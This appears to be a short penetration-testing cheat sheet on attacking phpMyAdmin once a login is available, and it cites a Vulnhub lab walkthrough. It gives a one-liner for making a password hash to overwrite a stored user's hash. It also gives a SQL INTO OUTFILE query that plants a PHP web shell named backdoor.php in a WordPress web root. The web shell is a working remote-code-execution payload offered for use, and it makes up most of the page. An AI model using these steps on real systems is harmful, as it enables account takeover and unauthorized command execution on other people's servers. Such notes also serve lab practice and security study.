PHPMyAdmin

Requires: Credentials to login
Password Alteration
Change the password hash of the stored user - IPPSEC​
php -a
echo password_hash('dnoscp', PASSWORD_DEFAULT);
RCE via SQL
SQL into outfile wirte method leads to SHELL ( change the outfile based on CMS )
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"
Machine:
LemonSqueezy:1 Vulnhub Walkthrough - Hacking Articles
Hacking Articles

Last modified 11mo ago